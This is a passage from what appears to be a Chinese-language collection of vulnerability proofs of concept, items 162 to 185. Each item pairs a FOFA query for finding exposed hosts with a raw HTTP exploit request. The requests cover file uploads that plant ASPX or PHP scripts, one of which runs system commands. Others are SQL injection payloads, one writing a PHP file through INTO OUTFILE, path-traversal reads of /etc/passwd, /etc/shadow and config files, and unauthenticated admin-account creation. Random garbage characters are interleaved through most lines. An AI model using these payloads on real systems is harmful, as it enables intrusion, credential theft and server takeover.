" Z5 i- Y' @ k1 Y9 w! U& P) D: v! H
' C P0 k0 K/ X% M* ohttp://x.x.x.x/dizxdell.aspx8 \( Q8 B* F/ t
7 |2 T" E6 B$ q3 d( l
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
8 l2 A. q& p1 |% d; r1 yFOFA: app="和丰山海-数字标牌"
1 Y. t. @( ^' ?" I2 Y yPOST /QH.aspx HTTP/1.1
! U4 T* [; S" E" W1 P# B+ @: @Host: x.x.x.x
- y4 C) M, y1 s! c) ^$ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0+ l' ~& s5 F. j1 T$ b, R8 a8 y
Connection: close
7 Q& n2 l; K" mContent-Length: 583
- F6 j2 R I: U4 s' x* }9 sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
# j$ S% a' ?( _- iAccept-Encoding: gzip: S: o( ]9 @3 p6 U/ E% E( L
. E* @% x4 T. K------WebKitFormBoundaryeegvclmyurlotuey
% _! T+ |2 e/ _& P5 T0 `* cContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"# w5 A4 d4 H* e" X
Content-Type: application/octet-stream
. z R( J2 r9 G' b/ P& C3 K
# O' S3 r1 o: H7 M9 E+ H/ ~<% response.write("ujidwqfuuqjalgkvrpqy") %>6 b6 M4 l. l% P" e; A+ g' `
------WebKitFormBoundaryeegvclmyurlotuey; |; D7 Y: @4 Q7 q& Z/ @2 s9 C
Content-Disposition: form-data; name="action"
, m; B3 |6 ^1 X0 q6 A: [' E
8 {1 o; k4 D9 s7 Kupload
y0 |. a8 e3 K: i------WebKitFormBoundaryeegvclmyurlotuey4 k3 ~- Q/ b8 n. ]( g9 Z: C7 n
Content-Disposition: form-data; name="responderId"
& w5 V, y( P3 `' u8 [3 V$ p' A) C @
ResourceNewResponder- U; F) G( g5 [, m' G) `- Q+ q2 \$ U& |
------WebKitFormBoundaryeegvclmyurlotuey
0 o% ?' Z3 r. o2 hContent-Disposition: form-data; name="remotePath"
A: U. F( ?" [ T; C8 \" e+ b# l H
. V+ w) D: b6 X& |/ `/opt/resources
: y* ^+ V# S$ b s* I------WebKitFormBoundaryeegvclmyurlotuey--
3 z4 B: _+ J7 k" I
/ N3 V% q! }! r" w; x4 ]& W: ]& O5 p3 y- y) ^6 N
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
$ B4 N" @, Y* C! }# q7 p# ^/ J8 C3 v* o/ d* @ k4 C6 m) [ @) g
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传4 ?2 Q2 H* x7 E) U, Q2 q Q4 q
FOFA: icon_hash="-795291075"
+ d$ f* K: R. \- y$ }! fPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1( |0 A! ^) j/ Z' j# S) Z# \
Host: x.x.x.x4 D2 A$ `- L. Q$ V0 I! H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
, R" I, W+ x! |Connection: close4 ~( c2 }; G7 y
Content-Length: 293
: H" h, _) t7 Q6 _7 zAccept: */*
( m! B/ c0 M0 ]* l) S R" AAccept-Encoding: gzip, deflate( q% o/ N/ g, O3 U7 G$ a
Accept-Language: zh-CN,zh;q=0.9
' M) Z. X. z1 J" t r9 K: Y- W" PContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
+ _ e& w# y3 Q3 B/ l, O. A! [( P: F( M( j9 a+ F; ~4 m$ \
------iiqvnofupvhdyrcoqyuujyetjvqgocod) u# c3 k# x6 }: b" p; r
Content-Disposition: form-data; name="name"
& R0 n+ `3 P% d
! L+ N& T% w3 E' w: W9 n5 t/ L* V1.php
! w9 ?- w! U' z7 }------iiqvnofupvhdyrcoqyuujyetjvqgocod
; c9 U( R; m5 e# m2 T6 FContent-Disposition: form-data; name="upfile"; filename="1.php"
$ M( N9 T/ v" _) h$ m T! C8 Y5 c2 H2 bContent-Type: image/jpeg: y7 _1 N& |! J" p; |
5 q! g. _% s" C9 o9 l
rvjhvbhwwuooyiioxega
2 J3 |1 I. u$ X3 t) d------iiqvnofupvhdyrcoqyuujyetjvqgocod--4 v7 O7 d4 w7 B' d. k
# s" ]: o, ~; D# Z- M+ u+ o% Q
8 j% O/ n m2 }1 \ b( x164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ c0 ^* K) V7 a
FOFA: title="智慧综合管理平台登入"
8 w, `6 \ E& b$ zPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.11 c# T7 f Q+ I) `
Host: x.x.x.x
& b1 `9 l; k+ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
/ r2 k+ W, t: R* iContent-Length: 288
- t( m- b J$ E8 }) q9 n2 tAccept: application/json, text/javascript, */*; q=0.012 x8 Y% j3 ^3 |5 a; {: @% R- A( p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
% V: t9 y& l7 T0 \+ {6 |5 G: t! }Connection: close
/ F$ U9 S$ V- C+ O" h% T( pContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* z& N: O2 \7 MX-Requested-With: XMLHttpRequest4 S( ^$ |. _% o1 V3 G0 P4 R6 }
Accept-Encoding: gzip1 m5 ?* t7 v+ L. S) V
7 Z7 O) |% q, n. S8 l' V------dqdaieopnozbkapjacdbdthlvtlyl
* z% F, A5 v; J {7 g) `5 H4 Q# aContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"# L% O" } Z, D, z" ?) C
Content-Type: image/jpeg
" H% Z/ g1 c1 k5 I$ S
& @$ H) M( d% `- H( ~9 Z<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>0 m% D0 R J5 E1 J
------dqdaieopnozbkapjacdbdthlvtlyl--, n8 s! O b& W5 C6 ]" y8 z
7 l M" D0 U+ _* a; l+ u* T) g
- j2 A4 q- z8 k" b7 Q$ y6 hhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx5 g) z4 K2 N& c# z. y( T8 y
3 g5 K% I6 k$ u b6 n# f! C/ q( n165. OrangeHRM 3.3.3 SQL 注入
4 ^8 w" K z& TCVE-2024-36428
( T' Y( Q0 Q B6 n0 E8 `" oFOFA: app="OrangeHRM-产品"' p8 A/ w' z+ i% K$ C; e# }% @* c
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
, t4 s# n! h% J$ m$ h* I d& e$ M5 y4 G
0 T& i3 z& P$ C8 m9 j5 m
166. 中成科信票务管理平台SeatMapHandler SQL注入
9 t6 }% q$ D# KFOFA:body="技术支持:北京中成科信科技发展有限公司"
$ s( x# ~( H! @& J& @! }7 d2 u, jPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
5 G; V, z, j7 Z6 c9 S' j( ^: xHost:
+ E* l/ m6 Z/ \, |+ v& s6 GPragma: no-cache1 Y6 \9 y, [* w. U* y Q5 p6 u6 r% C$ Y/ b
Cache-Control: no-cache) p4 s9 ^3 J+ E9 ]6 Y: j
Upgrade-Insecure-Requests: 1! g+ N4 }5 j( j% W5 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36# D7 [; m2 Y; } W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
H$ u- ~0 f; z. |6 FAccept-Encoding: gzip, deflate, c" X( g( o: r6 G- _, d5 V# v
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- I% \0 J6 O1 B# m$ v3 i# B# Q* {! G
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE6 l( U7 B8 R: D9 z
Connection: close
B! | Y$ V# |: Q2 k, z4 _Content-Type: application/x-www-form-urlencoded6 P6 [. G- f9 g6 p5 v T! z( v
Content-Length: 89: T, o: v4 f! m4 m' C, J/ g) Y% V7 D
9 v1 P/ }. G+ `& W, e* k
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
# D2 I7 E( d# i# M4 i5 y$ [( k* w& I
0 V& Q" `& R9 g" Y4 R6 j167. 精益价值管理系统 DownLoad.aspx任意文件读取0 m, |% B# D' B7 C% x
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
* r1 E! D& B( W5 iGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
4 [7 g# e/ V* E, j& n, W1 ]) AHost:
7 i0 k3 p6 M) j% Y0 D* w( H uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 y; T8 l0 q) I4 ^& P
Content-Type: application/x-www-form-urlencoded
}8 U$ a* b' ^0 ^, U0 ^3 G3 ? ?Accept-Encoding: gzip, deflate
' q* ?5 H ~+ uAccept: */*
& u4 S1 j- I1 _7 F; K% J* J# IConnection: keep-alive
4 o5 X$ n" ^1 g% B' r) e) U* v+ [; P6 U1 J, D
; q5 s0 R# g; q6 K2 S7 q
168. 宏景EHR OutputCode 任意文件读取
2 g, n2 x4 W* K, kFOFA:app="HJSOFT-HCM") ~2 h3 ~1 K- D4 w4 p* r
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1) Z- v& u7 H0 h, v4 z" {
Host: your-ip
! g5 R$ i$ V6 ]! t4 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36) S3 q2 p2 i, j' I3 P
Content-Type: application/x-www-form-urlencoded' U' `% [, ?: C
Connection: close* }! Z" i9 p/ W& ^. b9 v8 w- K4 z
7 U- |! x6 R$ Q: n( \& [
; L( I8 a# C4 N$ D* B
. G5 V4 o( E( |% a m! {$ `4 ?169. 宏景EHR downlawbase SQL注入
& O) S1 a$ {& S7 ]. h8 \FOFA:app="HJSOFT-HCM"
+ t3 Q1 ?9 R" ~+ X8 [, Q& @GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
% G4 [' V2 k; T( ]* e1 qHost: your-ip$ z8 ]' [5 A' w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; l3 w- K! U- D* d3 |5 Y
Accept: */*
9 r$ l7 l+ Z% |Accept-Encoding: gzip, deflate! W4 Y6 G2 q/ Y0 J5 i" L
Connection: close
" ? k; l# ~3 A: U4 w& i( a$ t# L+ k' |9 z. d m( ]1 l3 Z
) [- L% }1 I. @$ s4 q% `/ G6 z; E* i9 f) p* i
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
' i2 |7 ^6 g4 I! gFOFA:body="/general/sys/hjaxmanage.js"
3 C( l" b, g, iPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
! E$ ^: N. u F8 KHost: balalanengliang9 p: J6 u1 `. n, B7 Z9 C; R
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: J# Q- A, j' |, Z+ y3 O/ t4 b8 h
Content-Type: application/x-www-form-urlencoded
& s) d6 [0 i+ H6 n) f4 d
% g1 N3 ] ^- }) j. a6 S; xfilename=../webapps/ROOT/WEB-INF/web.xml. ~6 ~8 t. o- m5 v6 }
2 `$ z! O0 q7 c& v2 [$ |5 O* p% x: @! \8 u
171. 通天星CMSV6车载定位监控平台 SQL注入
\ v) B+ c' q2 V! KFOFA:body="/808gps/"
. M! |& I+ n# z1 S/ z8 `8 q' PGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1! @" N8 y' H7 K! P: O8 f% c J
Host: your-ip
( g( e, C' Z' W0 Y1 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 Q q: a/ k4 e& a& Y8 `' t9 A% c1 TAccept: */*# [; B" f. e8 k0 Q/ Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 e: X% P; \' N3 LAccept-Encoding: gzip, deflate; p0 e# d+ _) k# }1 w
Connection: close: e# M0 P, }9 B# {
+ [% V, L4 ~8 y
, \" U8 c, l+ ~# ]6 f4 o
) i5 X7 d7 y! ?172. DT-高清车牌识别摄像机任意文件读取
& M1 d, V" _( t8 U. O4 y$ ]% O- FFOFA:app="DT-高清车牌识别摄像机"" `1 w. W4 c/ A0 x7 b$ `( b/ \( g2 _! h
GET /../../../../etc/passwd HTTP/1.16 P. E: x8 Q! r* D) t. N; `
Host: your-ip
- a: z0 E+ ^/ D0 Q! L; eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 b2 @6 r% u, A1 x6 e" g6 P
Accept-Encoding: gzip, deflate
# X: b: e q% }Accept: */*$ z! x/ [. J7 X/ X! v. E6 K! G$ K
Connection: keep-alive
1 M% J: f; R$ E6 |+ p5 P* r
0 D6 y, Q$ B( m2 m& E" t6 g) q
, h* D) t2 i1 p5 s' z/ ]
1 v$ H5 e# l# ]. R173. Check Point 安全网关任意文件读取
% h7 }! U. E5 ]' vCVE-2024-24919
+ y. i' |3 J( r. E5 @% h( KFOFA:app="Check_Point-SSL-Network-Extender"
* Y, m+ n, L9 Q6 ?9 pPOST /clients/MyCRL HTTP/1.1
! |9 I0 _$ W5 K v4 ~+ XHost: your-ip0 x8 k% o) [# z. `
Content-Type: application/x-www-form-urlencoded
' d+ r, Y7 x6 I& v7 i( k" p
1 x( V$ |$ u: X3 Z( C: gaCSHELL/../../../../../../../etc/shadow
/ n X% w a5 n# g' ?: L
7 `4 a* B' g5 i2 n6 m, Y; G$ Z; J# v0 m3 P* j
, [4 V' b! s- Z- B- }174. 金和OA C6 FileDownLoad.aspx 任意文件读取
' J/ ~8 g% p9 u( tFOFA:app="金和网络-金和OA"+ o4 d& L6 C) [7 _ V9 C
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
3 d, [9 @8 B- [Host: your-ip4 S1 a+ N" ^ K7 S# d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 {( U6 J: r7 x2 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# C' T' Y6 l. [1 n
Accept-Encoding: gzip, deflate, br
* ?3 ?! |& T1 w# G. JAccept-Language: zh-CN,zh;q=0.9
C" |' {2 t9 ^& a% i' y- c1 aConnection: close
; _1 N; v4 d/ |5 s3 E2 M8 A! m! Q' I
- x. N- X, r, @ K5 m) x R$ v
2 O- A- O7 L' q0 U/ }175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
* }. y0 S7 u. KFOFA:app="金和网络-金和OA"
& C5 j) Q8 ^1 ^7 u1 yGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
* K: F0 W% i# S T% z- b, B# YHost:# D9 e8 }! j; K2 Z0 e9 D
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 Y l# C4 F* f8 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ p1 _/ ?: q3 T# DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: @8 o# S( M8 p( X. B
Accept-Encoding: gzip, deflate& H! D; B+ s! T O
Connection: close( t% q0 i' c1 ~) r; ^* l
Upgrade-Insecure-Requests: 1
, q5 _2 V* t- R: G ]1 o$ x! Q7 C" m! x! P# U; d
( F1 b) C, m3 u* \176. 电信网关配置管理系统 rewrite.php 文件上传
$ q& M) W. Z0 w( DFOFA:body="img/login_bg3.png" && body="系统登录"+ P" o$ e# \4 b
POST /manager/teletext/material/rewrite.php HTTP/1.1
: A$ b9 c! \/ O4 LHost: your-ip6 d, W, [ o/ x- L; ]3 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( e j. [+ `7 ~) |7 y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
1 T# N! ^7 d5 I) X0 N) W( X1 fConnection: close
2 S; ~0 e& @0 A) a6 ?. A% ~6 e( G j/ B1 Q" ?2 q
------WebKitFormBoundaryOKldnDPT9 z; j0 \) i5 I) N& C
Content-Disposition: form-data; name="tmp_name"; filename="test.php"6 e, o6 v8 O' U3 X
Content-Type: image/png* K0 y8 `* }3 F
9 @; \: s1 i9 J+ t8 t) i& }6 {8 p
<?php system("cat /etc/passwd");unlink(__FILE__);?>
* q$ Z0 D9 t; e/ F1 p+ c------WebKitFormBoundaryOKldnDPT
# r+ y. R+ y( A& y5 a. ?Content-Disposition: form-data; name="uploadtime"
4 X% J) m8 N1 ^( k: ^ . N5 [- x1 ?# P% n" A+ |4 ]4 I
( H: x* w5 P" c------WebKitFormBoundaryOKldnDPT--- x7 v" t& q; z1 I& X* N7 P
) V% G- V' b- b( [5 K5 D) ?; a, N; J! j* u7 g, g
; X! u) m+ ]' G, ]) ~7 w177. H3C路由器敏感信息泄露
' ]) B. c$ w3 `1 J, H3 {) v/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
; c% T3 F" A ^8 F/userLogin.asp/../actionpolicy_status/../M60.cfg w& u5 X3 V5 S% d# f
/userLogin.asp/../actionpolicy_status/../GR8300.cfg* c# o, L* @6 h6 `9 ]) u- C
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
6 l5 t* P! O D. o$ F5 a A/userLogin.asp/../actionpolicy_status/../GR3200.cfg8 Q- a1 m( W- ]9 W: i6 ]$ g; r h( n
/userLogin.asp/../actionpolicy_status/../GR2200.cfg. x9 W/ P: | L# N }- I7 |. R
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg! V$ E _) A1 W w9 A- D6 {7 H
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
5 d( y$ g7 s# r Y9 o' H- h+ @/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg$ ] w5 V; k2 P6 E
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
1 K, N- C" E7 ^) {/userLogin.asp/../actionpolicy_status/../ER5200.cfg
1 M* R) a2 {# E' h! t/userLogin.asp/../actionpolicy_status/../ER5100.cfg D9 ^# H! k' J: b1 x
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
0 H$ {5 y6 ?! B3 F6 I/userLogin.asp/../actionpolicy_status/../ER3260.cfg
$ }3 z- @2 V) K# f* q3 F; V/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
2 D9 {1 }1 n, w6 }6 m( |' I/userLogin.asp/../actionpolicy_status/../ER3200.cfg+ O& D5 g9 \, Z7 \' N
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg( [: W ]) p$ ~9 l
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg, {0 H- q! K1 ]: m$ }3 H- W2 W3 q
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
5 g% X' i0 X8 i/userLogin.asp/../actionpolicy_status/../ER3100.cfg
: p) W- \5 M: S( S, ~+ U2 k: o/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg6 T# s3 i8 B8 b
) B8 _1 p+ l9 h& U# S8 ^
& @5 m% p. w$ C178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 |' g1 d2 M8 b! j- RFOFA:header="/selfservice"
8 }5 `/ Q+ c1 g4 V( S, j( I* R. yPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1! c" a/ v! u# z7 c* x
Host:
0 l: t0 {' C; g9 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) \1 ]& ?) m, ?3 Q/ n9 GContent-Length: 252
& _1 C- p, s' K, F/ E8 fAccept-Encoding: gzip, deflate
6 _; \3 l8 K: i* |2 Q5 h3 U# sConnection: close4 i) @7 Q. I, F4 O: \
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l) j6 \6 o- v5 `. u Z! S, q
-----------------aqutkea7vvanpqy3rh2l9 @$ i) L4 T0 I% t; [0 N# A
Content-Disposition: form-data; name="12234.txt"; filename="12234"* g$ F! v# J" Q7 e+ t+ T3 k: w
Content-Type: application/octet-stream6 c& `# E5 R \% f5 D
Content-Length: 255
9 q, o( p$ K+ s
6 @( ?1 G: l& N12234* A" f+ T- ^" i6 w t
-----------------aqutkea7vvanpqy3rh2l--4 }: R9 T; @; I( ?2 d( x w
+ p7 C' \5 c# J6 l
: {: a! [ r0 N8 [* p( pGET /imc/primepush/%2e%2e/flex/12234.txt
6 T0 X$ R1 \+ A1 l# k! F* @; K/ Z4 t
4 ~, l# L2 y/ Y% G' x' C3 ^
179. 建文工程管理系统存在任意文件读取/ [0 r1 c8 \1 A0 l! u
POST /Common/DownLoad2.aspx HTTP/1.1
. s2 y4 E+ g( n' t* f: s6 gHost: {{Hostname}}
2 |5 J! G2 I( yContent-Type: application/x-www-form-urlencoded
8 J* o( u% d( O" H2 XUser-Agent: Mozilla/5.0
# P( {& J* T2 j4 l, w8 G, S) d$ i7 R1 H# D
path=../log4net.config&Name=% x" J7 N8 M3 M
3 S6 D3 ?1 B! S5 z
5 {3 x+ t- k8 d; ]180. 帮管客 CRM jiliyu SQL注入3 H' @+ Z5 [4 d9 ^
FOFA:app="帮管客-CRM"1 S4 e2 n3 n+ \$ N4 y
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1+ i2 X+ i9 H) v7 t. ]
Host: your-ip
( x8 s/ i& r- ]" ?. k- V y- S" U! MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 j4 l9 u3 o7 x: U" r" `. uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% Y( H. k2 ?# `6 N6 T: X7 AAccept-Encoding: gzip, deflate2 Y: B, t) P* F) j
Accept-Language: zh-CN,zh;q=0.9, N7 k! A" b& x* b' B
Connection: close" @! N! n. h8 o# r, V9 s
' i- L( C( P6 J& V1 @$ K, W: l
6 @- _- a( [6 I181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; I# L H6 L+ kFOFA:"PDCA/js/_publicCom.js"- C u |; f) ~2 W' V/ ~8 c% x' W
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
$ J8 @9 ]9 v( ^! q8 }7 w" l" vHost: your-ip/ u2 c% v* a% D, K3 D. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ B! \1 w+ R4 {5 q0 Z+ f5 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( K* h j6 X/ \, e
Accept-Encoding: gzip, deflate, br4 l6 Q; J$ j8 P, O Q' t: A
Accept-Language: zh-CN,zh;q=0.9
* q8 G% T# |2 V% |- x( q& ZConnection: close2 ]$ @. u, d% ^6 X
Content-Type: application/x-www-form-urlencoded, U. i, r/ A4 L1 f$ z' B
8 N0 j3 ], o$ T+ L) Q' h
3 z9 k) X4 w4 @, u" }1 ~action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
4 ?5 _# W8 [1 C! P8 P
i- o. T" @1 ]) M% N6 i: @5 Q: F) C% E. r, u
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建/ W1 @4 m5 B ?) R+ I* l5 A
FOFA:"PDCA/js/_publicCom.js"
Z6 i8 T) L4 L2 E1 f! g/ \POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
k; W# Z# {. g1 _0 D; ^( kHost: your-ip2 y( y8 C* g I! R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 L8 Z" q7 @( N& L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ Y6 I! d1 H4 j5 b7 l
Accept-Encoding: gzip, deflate, br
. }5 R8 H9 o3 t/ X9 ]Accept-Language: zh-CN,zh;q=0.9
! [: t. ?5 n! k+ ~1 ] xConnection: close7 f7 o0 C: R5 Q6 U
Content-Type: application/x-www-form-urlencoded( [' |" g4 S# n2 b+ k: v8 D& ^
/ ` ~, |! T6 K" n
8 O' ? X) I! l Kusername=test1234&pwd=test1234&savedays=1
* P% r3 ]+ V6 Q/ I5 W1 t- R) Q9 K; Y+ W# p/ ]" w0 p, z r0 }0 x
3 W4 h" P1 {# e' \* M1 g183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
: x; X' Y) ]. \: G' t" x1 mFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"7 p4 @9 R6 P5 n) @/ ^
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1- V: O" Z" {% L# ^" V0 |
Host: your-ip# h+ U1 p0 a- t2 b: f { q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; t/ d' X* T& `3 J' c% `
Accept-Charset: utf-80 I |( S0 ]8 z/ H7 O' l
Accept-Encoding: gzip, deflate! R& c0 u6 g2 t$ r9 w/ m! X
Connection: close
& s6 y* e" a5 n$ I: }; Y+ O5 D Q+ t5 t; u+ O$ W
# q3 r1 D- [0 ?, f! r* d T184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
L) t( v% M+ F/ z& e$ O" j! c V% |FOFA:server="SunFull-Webs"/ O- ?$ x4 A; O3 m& r
POST /soap/AddUser HTTP/1.1
+ @" [& n/ o7 ~5 a jHost: your-ip) A, p2 b" L+ i3 y, p( E5 c# X% l
Accept-Encoding: gzip, deflate
6 I, z" x% d& @3 L5 s8 {# qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) h7 I2 L& O Z0 _$ T$ d6 MAccept: application/xml, text/xml, */*; q=0.017 i* M8 o8 U8 t9 j; P# q
Content-Type: text/xml; charset=utf-8
4 z) `( o4 u7 G# ^6 d7 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 [* }8 c4 g1 X5 U2 T1 xX-Requested-With: XMLHttpRequest0 j; }* [- ^/ N- s
- l5 ?2 X8 B- C, x& P+ Z
9 P- p' l G4 ~, Q: L8 X; Ainsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')( N5 R) H0 t" }4 u+ s& l
1 L- q1 B' T* y4 y
$ U- e8 E2 J8 X3 S- `185. 瑞友天翼应用虚拟化系统SQL注入- g7 U; Z& h1 W' O& {
version < 7.0.5.1
$ r+ h6 |$ N. Q6 g" WFOFA:app="REALOR-天翼应用虚拟化系统"' ^& u, U6 z0 @! S, N4 V
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
5 J. U- X) |9 n. N1 yHost: host' l* l( k! \' [$ [" x
/ }. D' ` I+ r5 R6 T+ M( x4 y1 s% T( Z! `9 Q; b' z, `
